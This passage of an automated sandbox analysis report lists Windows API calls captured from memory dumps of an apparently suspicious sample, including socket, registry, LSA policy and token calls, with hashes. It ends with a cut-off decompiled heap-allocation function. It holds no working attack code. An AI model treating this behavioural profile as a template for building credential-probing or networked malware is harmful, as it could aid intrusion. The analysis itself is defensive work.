                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5BEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 024E0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00C5B9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CopyFileW.KERNELBASE(?,?,?), ref: 024E2EFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00C5BDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00C5AC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00C5B4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateMutexW.KERNELBASE(?,?), ref: 024E0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5AD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5B19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 024E0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00C5BAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00C5B9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 024E1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessTimes.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C5A672
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(?), ref: 00C5A724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E3319
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 024E02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConsoleCtrlHandler
                                                                                              • String ID:
                                                                                              • API String ID: 1513847179-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00C5A384
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 024E15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CopyFileW.KERNELBASE(?,?,?), ref: 024E2EFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5BEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaLookupNames2.ADVAPI32(?,00000E80,?,?), ref: 00C5B732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupNames2
                                                                                              • String ID:
                                                                                              • API String ID: 2701605370-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(?,00000E80,?,?), ref: 00C5A2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 024E153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 024E1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C5A672
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00C5A384
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: 9152e70abde67275d12f4bbfe0ceabbedb034265f62eff12e322146c7c72618c
                                                                                              • Instruction ID: 0b93ddc2931f1f6782e00e3365883fe965510f866549ebfb80eaa5b56e4ad7dc
                                                                                              • Opcode Fuzzy Hash: 9152e70abde67275d12f4bbfe0ceabbedb034265f62eff12e322146c7c72618c
                                                                                              • Instruction Fuzzy Hash: F601A2759002449FDB10CF2AD8847A6FFA4EF40325F18C0AADD598F352D279E948CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00C5B932
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 8f7506e02281ed1485cbe7f8783f62c6d99255423354f6872701d226ee550141
                                                                                              • Instruction ID: 67b14d9832d6a56dbdbe0523cced5e6d200b73e94e99f3034fb423feb7234090
                                                                                              • Opcode Fuzzy Hash: 8f7506e02281ed1485cbe7f8783f62c6d99255423354f6872701d226ee550141
                                                                                              • Instruction Fuzzy Hash: 4601AD72600200ABD210DF1ADC86B32FBE8FB88B20F14811AED085B745E771F915CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00C5BAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: efed3a4a4a5feaa88ab6682c2004b5e4ac13adc6533128cec3d74c3ee1de177b
                                                                                              • Instruction ID: 7c92d01fe08fe55f0f968286343cf708a7b300ba1f6794773ffa8e2c480a888a
                                                                                              • Opcode Fuzzy Hash: efed3a4a4a5feaa88ab6682c2004b5e4ac13adc6533128cec3d74c3ee1de177b
                                                                                              • Instruction Fuzzy Hash: 73019E75400240DFDB20CF56D884BA6FFA0FF14321F18C4AAED594B212D375A858DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 024E15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: d47e09cb58a7a9a79875b06cdee09e3ab41ffa6d26a9ba0673faa26738014c7a
                                                                                              • Instruction ID: e64cd3639154c985dbff1d02c9de84eb700993c9004f7dba3ca46ec155698739
                                                                                              • Opcode Fuzzy Hash: d47e09cb58a7a9a79875b06cdee09e3ab41ffa6d26a9ba0673faa26738014c7a
                                                                                              • Instruction Fuzzy Hash: 8F018C715002409FEB208F55D844B66FFE0EF04722F08C4AAED4E8B252D375A418CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 024E02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConsoleCtrlHandler
                                                                                              • String ID:
                                                                                              • API String ID: 1513847179-0
                                                                                              • Opcode ID: a7ff9bf761997bacb0c739e5c4bcd75d5a61d5786ff5418b0363ba893e8588b5
                                                                                              • Instruction ID: fc37d3a69efe774b0887ca1aabbd023fb83ecdc51037cf4a76c1c992b68246c4
                                                                                              • Opcode Fuzzy Hash: a7ff9bf761997bacb0c739e5c4bcd75d5a61d5786ff5418b0363ba893e8588b5
                                                                                              • Instruction Fuzzy Hash: 9201AD72600200ABD210DF1ADC86B32FBE8FB88B20F14815AED085B745E635F915CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E3319
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 83a166881ff6d6c463eaec3307351e4bb736377579d217e830b55d5e16a201d5
                                                                                              • Instruction ID: faeeaef5352efb73e5f512d288dbc5d990ecbba69f05d4117445a5d08ab63ead
                                                                                              • Opcode Fuzzy Hash: 83a166881ff6d6c463eaec3307351e4bb736377579d217e830b55d5e16a201d5
                                                                                              • Instruction Fuzzy Hash: C401BC31500300DFEB218F56D884B66FFA0EF44321F08C0AAED4A4B652D7B1E458CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: closesocket
                                                                                              • String ID:
                                                                                              • API String ID: 2781271927-0
                                                                                              • Opcode ID: 79e279fb30eb5d65e948840b6f32b14955ff476dadc41ae8774703e546183242
                                                                                              • Instruction ID: d4d6d16d3dec213074402bb7d663468c377b8fbe189c4dae764f59b7aa870106
                                                                                              • Opcode Fuzzy Hash: 79e279fb30eb5d65e948840b6f32b14955ff476dadc41ae8774703e546183242
                                                                                              • Instruction Fuzzy Hash: B201D1749002409FDB10CF16E8847A6FFA4EF44322F18C0AADD498F246D279A848CBB6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: d4a827a155645521af3362995a73fb2e02b72f3423c3963ffafbb20df2ece5a5
                                                                                              • Instruction ID: b95bf2baf9ce644a17ebe2669f8509f6976dedf982cb67905d69f2b6015fd487
                                                                                              • Opcode Fuzzy Hash: d4a827a155645521af3362995a73fb2e02b72f3423c3963ffafbb20df2ece5a5
                                                                                              • Instruction Fuzzy Hash: 5C01A231500740DFEB20CF45D884B66FFA4EF14321F08D49AED4A0B266D3B5A458CF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 731fa2ff5dd0d928dcbfcd080fc5fd9a61dcc619492c415e5fb4f29610b7590d
                                                                                              • Instruction ID: 20a1e21818a2c9d699c9d2013d5f8abc802a99c9a36731d5736530d64cc28938
                                                                                              • Opcode Fuzzy Hash: 731fa2ff5dd0d928dcbfcd080fc5fd9a61dcc619492c415e5fb4f29610b7590d
                                                                                              • Instruction Fuzzy Hash: 3A01AD394006049FDB208F06D984762FFA0EF04721F18C19ADD8A0B252D275A94CEFB3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(?), ref: 00C5A724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: e23a004ef54ab58cf9cb405d7a32c3fdc786e48743837b4c933dca2100fe4a58
                                                                                              • Instruction ID: f34adb44aaa24b2315aa3ed433b1fdbc5ec3fa315027e61331b3c1c108f7ff3d
                                                                                              • Opcode Fuzzy Hash: e23a004ef54ab58cf9cb405d7a32c3fdc786e48743837b4c933dca2100fe4a58
                                                                                              • Instruction Fuzzy Hash: 97F0AF785006449FDB208F1AD884761FFA4EF48322F18C1AADD594B252D275A988CBA7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E00403E3D(void* __ecx, long _a4) {
                                                                                              				void* _t4;
                                                                                              				void* _t6;
                                                                                              				void* _t7;
                                                                                              				long _t8;
                                                                                              
                                                                                              				_t7 = __ecx;
                                                                                              				_t8 = _a4;
                                                                                              				if(_t8 > 0xffffffe0) {
                                                                                              					L7:
                                                                                              					 *((intOrPtr*)(E00404831())) = 0xc;
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				}
                                                                                              				if(_t8 == 0) {
                                                                                              					_t8 = _t8 + 1;
                                                                                              				}
                                                                                              				while(1) {
                                                                                              					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                                                                              					if(_t4 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags = E00403829();
                                                                                              					if(__eflags == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					_t6 = E004068FD(_t7, __eflags, _t8);
